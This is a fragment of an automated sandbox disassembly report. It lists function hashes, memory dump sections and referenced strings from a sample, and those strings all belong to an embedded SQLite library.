                                                                • String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
                                                                • API String ID: 0-2528248365
                                                                • Opcode ID: 4cfdf0f0b938772f43c2f3089a9b226ef18911b841d3081b99d8b35732ae4cf8
                                                                • Instruction ID: 5bb180e39e36e8f2fefe1d89927e4764862d9d6087f7cba6f88978050111f2fc
                                                                • Opcode Fuzzy Hash: 4cfdf0f0b938772f43c2f3089a9b226ef18911b841d3081b99d8b35732ae4cf8
                                                                • Instruction Fuzzy Hash: 9B7119B66043009FCB05CF24D884A6777E5AF88324F158A99FD8DDB252D731E945CB93
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: winShmMap1$winShmMap2$winShmMap3
                                                                • API String ID: 0-3826999013
                                                                • Opcode ID: 0ecf7c7bc23be2d8e63198e2b1e1d7f348f75e1d2b28ef40cab080bc7fddfcd4
                                                                • Instruction ID: 69e417fd52d005632387399398c9237df2e136557273e42ce0c7eef5ebd48a47
                                                                • Opcode Fuzzy Hash: 0ecf7c7bc23be2d8e63198e2b1e1d7f348f75e1d2b28ef40cab080bc7fddfcd4
                                                                • Instruction Fuzzy Hash: 0161BD715043019FDB12CF29C885B27B7E5AF84764F21896EE98697251EB34E805CBD2
                                                                APIs
                                                                • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 1D8E0FE7
                                                                • CatchIt.LIBVCRUNTIME ref: 1D8E10CD
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID: CatchEncodePointer
                                                                • String ID: MOC$RCC
                                                                • API String ID: 1435073870-2084237596
                                                                • Opcode ID: 28b2b590da160f0e36b1841d5aa337ab5d2ddbdae1b6215acf4ca71a71923402
                                                                • Instruction ID: 88f4adc3035384229f87d32fd494fb9728f76be3a8c27e1e2cc2c213b2456695
                                                                • Opcode Fuzzy Hash: 28b2b590da160f0e36b1841d5aa337ab5d2ddbdae1b6215acf4ca71a71923402
                                                                • Instruction Fuzzy Hash: 48415671900289EFCF05CF94D980AEEBBB5FF49340F158299FA08A7221D335A950DF52
                                                                Strings
                                                                • %s at line %d of [%.10s], xrefs: 1D7730A1
                                                                • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1D773092
                                                                • database corruption, xrefs: 1D77309C
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
                                                                • API String ID: 0-2528248365
                                                                • Opcode ID: db5db909be633267abe19cfac6263290f834ee6c1914e7547eb4107c94536c7f
                                                                • Instruction ID: a12c00e3cb5ae4f62b5c23e9b3b95d74d8760334a08a8a23ab58a2c4ca56a80b
                                                                • Opcode Fuzzy Hash: db5db909be633267abe19cfac6263290f834ee6c1914e7547eb4107c94536c7f
                                                                • Instruction Fuzzy Hash: B861D4755083059FCB04CF68C881A6BBBE4BF88714F41495EFA9887342E735E945CBA3
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: (join-%u)$(subquery-%u)
                                                                • API String ID: 0-2916047017
                                                                • Opcode ID: f4177daf25f6edef136a72716265e1235f8f0145d0e9d20094de2d89f4044afc
                                                                • Instruction ID: 013e5b12fa9e2a8bbde37f78d57f428c0eafc9132ab4b877bef2b9115a457825
                                                                • Opcode Fuzzy Hash: f4177daf25f6edef136a72716265e1235f8f0145d0e9d20094de2d89f4044afc
                                                                • Instruction Fuzzy Hash: E651F675608342ABCB18CF28D8D492777A1BF85726F058A5DEC6A4B217E735E401CB93
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: temp$wrong number of vtable arguments
                                                                • API String ID: 0-2849069181
                                                                • Opcode ID: 4fc408cc8294c683890dd5a59a06d16dacc4e5e49f1786f05bdb323be7917b84
                                                                • Instruction ID: 2ca27d29bc0766a4e66864e477c860ad19b18612974d0e7c589a010fc08dea84
                                                                • Opcode Fuzzy Hash: 4fc408cc8294c683890dd5a59a06d16dacc4e5e49f1786f05bdb323be7917b84
                                                                • Instruction Fuzzy Hash: 3651D3B59087458FC754CF14D4805AABBF1FF89328F444AAEE58A57312D332E94ACB93
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
                                                                • API String ID: 0-2528248365
                                                                • Opcode ID: 51a97bf93f92d1731c89a927928bd42502261f296b6697b85fab7de6965d2f2a
                                                                • Instruction ID: 2a70bc5bfbb8e0ddc3f80e9c773eada5d86f8bbecd76d1261e36e02f69419679
                                                                • Opcode Fuzzy Hash: 51a97bf93f92d1731c89a927928bd42502261f296b6697b85fab7de6965d2f2a
                                                                • Instruction Fuzzy Hash: 745197756083419FC308CF19C89086ABBF1FF99204F58899EF5969B312D331E956CBA3
                                                                Strings
                                                                • misuse, xrefs: 1D7735F4
                                                                • %s at line %d of [%.10s], xrefs: 1D7735F9
                                                                • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1D7735EA
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: %s at line %d of [%.10s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
                                                                • API String ID: 0-3564305576
                                                                • Opcode ID: 0fccc5cc6c39f1db60d449d0f965cce218729b27625459fdb5463246133c9d45
                                                                • Instruction ID: d6b6a62a4512dd3190f8cfe05ba8e01a3aee0fa1c4a8a847362cef314f640388
                                                                • Opcode Fuzzy Hash: 0fccc5cc6c39f1db60d449d0f965cce218729b27625459fdb5463246133c9d45
                                                                • Instruction Fuzzy Hash: 0E51D3F5A04315AFDF048F14C8C9A66BBA5FF44734F054A6AE9699B252E331E810CBD3
                                                                Strings
                                                                • %s at line %d of [%.10s], xrefs: 1D7E97EF
                                                                • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1D7E97E0
                                                                • database corruption, xrefs: 1D7E97EA
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
                                                                • API String ID: 0-2528248365
                                                                • Opcode ID: 7f558baacdde4bbfe4a790940a9cbc97563bb8ed30702ef6c376378ee469adc2
                                                                • Instruction ID: 032381155049000afb943b30c65d925241a99a281a263553b4d658116fe2b0b5
                                                                • Opcode Fuzzy Hash: 7f558baacdde4bbfe4a790940a9cbc97563bb8ed30702ef6c376378ee469adc2
                                                                • Instruction Fuzzy Hash: F541F5772047A08AD7218F6CD4406E6FFE0AF51261F1848AFD2D98B652E322E485D352
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: delayed %dms for lock/sharing conflict at line %d$winWrite1$winWrite2
                                                                • API String ID: 0-1808655853
                                                                • Opcode ID: 386b8c0fd6857c9e4d907a2ef9ab6c4fedd4f361fd34b0d5bbd7d58df73628ea
                                                                • Instruction ID: 86164f49b91a5e02418795d78ee7e7be2a64fb524f2e6b4b5b585b297a1bc35c
                                                                • Opcode Fuzzy Hash: 386b8c0fd6857c9e4d907a2ef9ab6c4fedd4f361fd34b0d5bbd7d58df73628ea
                                                                • Instruction Fuzzy Hash: 3E412771A043229BC3169F28C880ABFBBA4FB86220F718B6FFA15C7151D331D1458B93
                                                                Strings
                                                                • misuse, xrefs: 1D8B5980
                                                                • %s at line %d of [%.10s], xrefs: 1D8B5985
                                                                • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1D8B5976
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: %s at line %d of [%.10s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
                                                                • API String ID: 0-3564305576
                                                                • Opcode ID: b8334be6e7306cf360d8e39995da1d85013b1d3c844bfae71aa4988f0c01ec33
                                                                • Instruction ID: 6e698a9136eb54ec2a45f22a30ea30c101bfabcf8f32aeed8e3396617fdc3974
                                                                • Opcode Fuzzy Hash: b8334be6e7306cf360d8e39995da1d85013b1d3c844bfae71aa4988f0c01ec33
                                                                • Instruction Fuzzy Hash: D0411775904351AFD310DB18DC80BAAB7E4BF85320F8515A9F988A7351E329F998C7A3
                                                                Strings
                                                                • %s at line %d of [%.10s], xrefs: 1D80D306
                                                                • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1D80D2F7
                                                                • database corruption, xrefs: 1D80D301
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
                                                                • API String ID: 0-2528248365
                                                                • Opcode ID: 1bd243e3b10ce3d98be62cd3ee88707b97d11e8639cc4aa9ca94dff7f35f8549
                                                                • Instruction ID: 26317225c0b5756091ad9560df35f9a072b3498723aa51605065ed1cadb943d1
                                                                • Opcode Fuzzy Hash: 1bd243e3b10ce3d98be62cd3ee88707b97d11e8639cc4aa9ca94dff7f35f8549
                                                                • Instruction Fuzzy Hash: 3331E6B65046116FD7119E18DC40EABB7A8EF84764F060429FA4997622E621E9418B93
                                                                Strings
                                                                • os_win.c:%d: (%lu) %s(%s) - %s, xrefs: 1D8C88E2
                                                                • delayed %dms for lock/sharing conflict at line %d, xrefs: 1D8C895F
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: delayed %dms for lock/sharing conflict at line %d$os_win.c:%d: (%lu) %s(%s) - %s
                                                                • API String ID: 0-1037342196
                                                                • Opcode ID: de432457a2c1527251b8bf42fedeff9279415f1e19558f9b02ce012932d9847a
                                                                • Instruction ID: e2bd4c45e22ba2e79fa2ad3414e55d17c831df3cdb4af1b516a4f9c0f149b8dd
                                                                • Opcode Fuzzy Hash: de432457a2c1527251b8bf42fedeff9279415f1e19558f9b02ce012932d9847a
                                                                • Instruction Fuzzy Hash: C8213575648346EFD7209B14DD84BFBBBE9ABC4304F584C6CE688871A3C239E8448793
                                                                Strings
                                                                • %s at line %d of [%.10s], xrefs: 1D77540D
                                                                • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1D7753FE
                                                                • database corruption, xrefs: 1D775408
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
                                                                • API String ID: 0-2528248365
                                                                • Opcode ID: 1e9a38d25d72804d38054755aa5aaa422c4b5da0aa2907e996c8382f1a57dcb0
                                                                • Instruction ID: 431ea5b22d31fbfd8d9f86d7885ed9f35aa6f0a56a3a207985e3f877dc741697
                                                                • Opcode Fuzzy Hash: 1e9a38d25d72804d38054755aa5aaa422c4b5da0aa2907e996c8382f1a57dcb0
                                                                • Instruction Fuzzy Hash: 323123696447D186DB218B28D8447B6B7E09F41726F040C6EE9C987692E322F492C3A3
                                                                Strings
                                                                • error in tokenizer constructor, xrefs: 1D857F92
                                                                • no such tokenizer: %s, xrefs: 1D857F1B
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
